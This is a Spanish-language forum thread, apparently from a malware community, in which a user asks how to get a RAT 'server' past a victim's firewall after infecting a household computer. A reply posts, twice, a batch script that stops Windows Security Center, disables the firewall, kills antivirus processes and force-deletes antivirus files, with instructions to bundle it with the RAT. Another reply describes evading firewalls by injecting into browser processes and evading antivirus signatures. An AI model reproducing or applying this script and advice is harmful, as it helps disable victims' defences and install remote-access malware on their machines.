Hola, he leido que una vez creado el server, debes indetectarlo. para eso hay unos crypter muy puestos al dia que te lo llegan a dejar 100% indetectable. Pero me sorprendió que leer que siempre que tenga la victima el firewalls no podremos ver nada de ellos. que el crypter no se lo salta y que habria que usar un modo llamado RIT hexadecimal o algo así.
Queria saber si eso es al 100 % cierto, porque yo infecte otro ordenador que tengo en mi casa que tiene el firewalls de windows y yo veia mi server.
Gracias de antemano.
Los crypters con para indetectalos a los Anti Virus, hay herranientas para matar los firewalls te dejo un script anti-av/firewalls populares:
El codigo fue posteado por crud:http://www.indetectables.net/foro/viewt ... =8&t=11953
Copias el codigo anterior y en bloc de notas y al guardarlo le pones las siguiente extención: ".bat" (sin las comillas)
esto lo adjutas con tu server, primeros que se ejetuce el .bar y luego tu server.
Saludos
Código: Seleccionar todo
@ echo off
rem ---------------------------------
rem Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem ---------------------------------Copias el codigo anterior y en bloc de notas y al guardarlo le pones las siguiente extención: ".bat" (sin las comillas)
esto lo adjutas con tu server, primeros que se ejetuce el .bar y luego tu server.
Saludos
Estos códigos hechos en Batch no creo que sean del todo acertados, mas me apuesto un caramelo a que el tipo que lo creó no observó su funcionamiento en una prueba real... los procesos de los antivirus actualmente son de sistema y no son matables desde un usuario normal, tendríamos que escalar privilegios para conseguir pararlos sin programación no lo conseguiríamos.
Amigo chelero22 escuchaste cohetes pero no sabes bien de donde... los encriptadores obviamente no salta firewalls pues como su nombre indican sirven para encriptar el ejecutable modificando su código inicial y haciendo a la lectura de los AV invisible "En algunos casos", la única manera de saltarse un firewall actualmente es que el PC no cree conexiones nuevas y esto se hace engañándole como por ejemplo utilizando la inyección en los procesos de aplicaciones predeterminadas con conexión como es iexplore.exe, firefox.exe...los browsers predeterminados son la mejor arma.
RIT o HEX son métodos para indetectar firmas de malware puestas por los AV, estos métodos los puedes encontrar en la sección de manuales y tutoriales del foro.
Y la conexión con tu PC es seguramente en una red local así que no saliste ni de tu router a no ser que utilizases la IP externa o un NOIP.
Amigo chelero22 escuchaste cohetes pero no sabes bien de donde... los encriptadores obviamente no salta firewalls pues como su nombre indican sirven para encriptar el ejecutable modificando su código inicial y haciendo a la lectura de los AV invisible "En algunos casos", la única manera de saltarse un firewall actualmente es que el PC no cree conexiones nuevas y esto se hace engañándole como por ejemplo utilizando la inyección en los procesos de aplicaciones predeterminadas con conexión como es iexplore.exe, firefox.exe...los browsers predeterminados son la mejor arma.
RIT o HEX son métodos para indetectar firmas de malware puestas por los AV, estos métodos los puedes encontrar en la sección de manuales y tutoriales del foro.
Y la conexión con tu PC es seguramente en una red local así que no saliste ni de tu router a no ser que utilizases la IP externa o un NOIP.
No importa cuan rápida y avanzada sea la tecnología, la mente humana aún es el procesador más versátil y creativo que hay.
explicacion de todo un profesional en la materia .....
deveras esas respuestas son digna de admirar ....con un planteamiento super claro,
la verdad 4n0nym0us que sus conocimientos llegan mas alla de la realidad...( Subliminar )
deveras esas respuestas son digna de admirar ....con un planteamiento super claro,
la verdad 4n0nym0us que sus conocimientos llegan mas alla de la realidad...( Subliminar )
Joder ya te digo, una explicación excelente.
Bueno tengo que decir uso no-ip y creo que esta bien configurada. Tambien tengo que decir que el firewall de mi hermana estaba desactivado, por eso me iba. en cuanto lo active y reinicie nada de nada. Para volver a tener conexion lo desactivé y lo volví a activar y ya todo corria bien. Bueno amigo anonimus leyendo y aprendiendo. Gracias por todo.
un cordial saludo
Bueno tengo que decir uso no-ip y creo que esta bien configurada. Tambien tengo que decir que el firewall de mi hermana estaba desactivado, por eso me iba. en cuanto lo active y reinicie nada de nada. Para volver a tener conexion lo desactivé y lo volví a activar y ya todo corria bien. Bueno amigo anonimus leyendo y aprendiendo. Gracias por todo.
un cordial saludo
4n0nym0us escribió:Estos códigos hechos en Batch no creo que sean del todo acertados, mas me apuesto un caramelo a que el tipo que lo creó no observó su funcionamiento en una prueba real... los procesos de los antivirus actualmente son de sistema y no son matables desde un usuario normal, tendríamos que escalar privilegios para conseguir pararlos sin programación no lo conseguiríamos.
Amigo chelero22 escuchaste cohetes pero no sabes bien de donde... los encriptadores obviamente no salta firewalls pues como su nombre indican sirven para encriptar el ejecutable modificando su código inicial y haciendo a la lectura de los AV invisible "En algunos casos", la única manera de saltarse un firewall actualmente es que el PC no cree conexiones nuevas y esto se hace engañándole como por ejemplo utilizando la inyección en los procesos de aplicaciones predeterminadas con conexión como es iexplore.exe, firefox.exe...los browsers predeterminados son la mejor arma.
RIT o HEX son métodos para indetectar firmas de malware puestas por los AV, estos métodos los puedes encontrar en la sección de manuales y tutoriales del foro.
Y la conexión con tu PC es seguramente en una red local así que no saliste ni de tu router a no ser que utilizases la IP externa o un NOIP.
Gracias a ti tambien Ortek. Probaré eso que tu dices para ir aprendiendo mas.
Un salodote pati tambien
Un salodote pati tambien
Ortek escribió:Los crypters con para indetectalos a los Anti Virus, hay herranientas para matar los firewalls te dejo un script anti-av/firewalls populares:
El codigo fue posteado por crud:http://www.indetectables.net/foro/viewt ... =8&t=11953Código: Seleccionar todo
@ echo off rem --------------------------------- rem Kill Anti-Virus net stop “Security Center” netsh firewall set opmode mode=disable tskill /A av* tskill /A fire* tskill /A anti* cls tskill /A spy* tskill /A bullguard tskill /A PersFw tskill /A KAV* tskill /A ZONEALARM tskill /A SAFEWEB cls tskill /A OUTPOST tskill /A nv* tskill /A nav* tskill /A F-* tskill /A ESAFE tskill /A cle cls tskill /A BLACKICE tskill /A def* tskill /A kav tskill /A kav* tskill /A avg* tskill /A ash* cls tskill /A aswupdsv tskill /A ewid* tskill /A guard* tskill /A guar* tskill /A gcasDt* tskill /A msmp* cls tskill /A mcafe* tskill /A mghtml tskill /A msiexec tskill /A outpost tskill /A isafe tskill /A zap* cls tskill /A zauinst tskill /A upd* tskill /A zlclien* tskill /A minilog tskill /A cc* tskill /A norton* cls tskill /A norton au* tskill /A ccc* tskill /A npfmn* tskill /A loge* tskill /A nisum* tskill /A issvc tskill /A tmp* cls tskill /A tmn* tskill /A pcc* tskill /A cpd* tskill /A pop* tskill /A pav* tskill /A padmin cls tskill /A panda* tskill /A avsch* tskill /A sche* tskill /A syman* tskill /A virus* tskill /A realm* cls tskill /A sweep* tskill /A scan* tskill /A ad-* tskill /A safe* tskill /A avas* tskill /A norm* cls tskill /A offg* del /Q /F C:\Program Files\alwils~1\avast4\*.* del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe del /Q /F C:\Program Files\kasper~1\*.exe cls del /Q /F C:\Program Files\trojan~1\*.exe del /Q /F C:\Program Files\f-prot95\*.dll del /Q /F C:\Program Files\tbav\*.dat cls del /Q /F C:\Program Files\avpersonal\*.vdf del /Q /F C:\Program Files\Norton~1\*.cnt del /Q /F C:\Program Files\Mcafee\*.* cls del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.* del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.* del /Q /F C:\Program Files\Norton~1\Norton~1\*.* del /Q /F C:\Program Files\Norton~1\*.* cls del /Q /F C:\Program Files\avgamsr\*.exe del /Q /F C:\Program Files\avgamsvr\*.exe del /Q /F C:\Program Files\avgemc\*.exe cls del /Q /F C:\Program Files\avgcc\*.exe del /Q /F C:\Program Files\avgupsvc\*.exe del /Q /F C:\Program Files\grisoft del /Q /F C:\Program Files\nood32krn\*.exe del /Q /F C:\Program Files\nood32\*.exe cls del /Q /F C:\Program Files\nod32 del /Q /F C:\Program Files\nood32 del /Q /F C:\Program Files\kav\*.exe del /Q /F C:\Program Files\kavmm\*.exe del /Q /F C:\Program Files\kaspersky\*.* cls del /Q /F C:\Program Files\ewidoctrl\*.exe del /Q /F C:\Program Files\guard\*.exe del /Q /F C:\Program Files\ewido\*.exe cls del /Q /F C:\Program Files\pavprsrv\*.exe del /Q /F C:\Program Files\pavprot\*.exe del /Q /F C:\Program Files\avengine\*.exe cls del /Q /F C:\Program Files\apvxdwin\*.exe del /Q /F C:\Program Files\webproxy\*.exe del /Q /F C:\Program Files\panda software\*.* rem ---------------------------------
Copias el codigo anterior y en bloc de notas y al guardarlo le pones las siguiente extención: ".bat" (sin las comillas)
esto lo adjutas con tu server, primeros que se ejetuce el .bar y luego tu server.
Saludos
